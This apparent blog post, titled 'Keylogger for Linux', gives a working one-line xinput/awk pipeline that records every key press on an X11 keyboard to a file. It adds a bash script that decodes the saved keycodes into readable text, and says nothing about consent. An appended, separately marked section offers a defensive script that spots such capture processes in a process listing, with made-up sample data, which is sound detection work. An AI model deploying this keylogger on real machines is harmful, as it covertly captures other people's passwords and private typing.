Tuesday, October 8, 2013

Keylogger for Linux

Dump the keystrokes according to their keycodes to a file called 'dump':
stdbuf -o0 xinput test 11 | stdbuf -o0 awk '/ press /' | stdbuf -o0 awk -F' ' '{print $3}' >> dump

Here, 11 is the xinput device id of the keyboard (the standard AT translated keyboard or something); the id differs from system to system. You can figure this number out from the command xinput --list.

Now decode them according to the xmodmap table:

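#!/bin/bash
#decode.sh
# Read one keycode per line from 'dump' and look up its keysym in xmodmap -pke.
while read -r line
do
    # Row (keycode - 7) of xmodmap -pke holds that keycode when the table
    # starts at keycode 8; field 4 is the unshifted keysym.
    xpr="$(xmodmap -pke | awk "NR==$line-7" | awk '{ print $4 }')"
#    echo "$xpr"
    case "$xpr" in
        Return)
            echo -e "\n" >> out2
            ;;
        space)
            echo -n " " >> out2
            ;;
        *)
            echo -n "$xpr" >> out2
            ;;
    esac
    # Separator between decoded keys
    echo -n " " >> out2
done < dump
echo -e "\n" >> out2
cat out2
##EOF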

You might need to edit this file depending upon your xmodmap -pke. For example, the offset in NR==$line-7 may need modification, since my xmodmap -pke starts from keycode 8 and follows the natural order throughout.
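On the detection side, the capture above only works while an xinput test process stays attached to the X server, so it is visible in the process table. The following is an added example (not part of the original post) that flags such processes from ps-style input; the function names and the sample listing are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post: triage check for processes that
# stream X11 key events via "xinput test" or "xinput test-xi2".

# Reads "PID USER ARGS..." lines on stdin and prints one line per match.
find_xinput_capture() {
    awk '
    NF >= 4 {
        n = split($3, path, "/")              # basename of argv[0]
        if (path[n] != "xinput") next
        sub_cmd = $4
        sub(/^-+/, "", sub_cmd)               # xinput also accepts --test
        if (sub_cmd != "test" && sub_cmd != "test-xi2") next
        args = $3
        for (i = 4; i <= NF; i++) args = args " " $i
        printf "pid=%s user=%s cmd=%s\n", $1, $2, args
    }'
}

# Constructed sample process listing (not captured from a real host).
sample_ps() {
    cat <<'EOF'
 1201 alice /usr/bin/Xorg :0 -seat seat0
 4242 alice xinput test 11
 4243 alice awk / press /
 4310 bob /usr/bin/xinput --test-xi2 --root
 4400 alice xinput --list
 4500 alice grep xinput test notes.txt
EOF
}

# Live use: ps -eo pid=,user=,args= | find_xinput_capture
sample_ps | find_xinput_capture
```

The check keys on the command name, so treat it as a quick triage heuristic. Under X11 any client on the display can subscribe to input events, which is why the command in the post needs no special privileges.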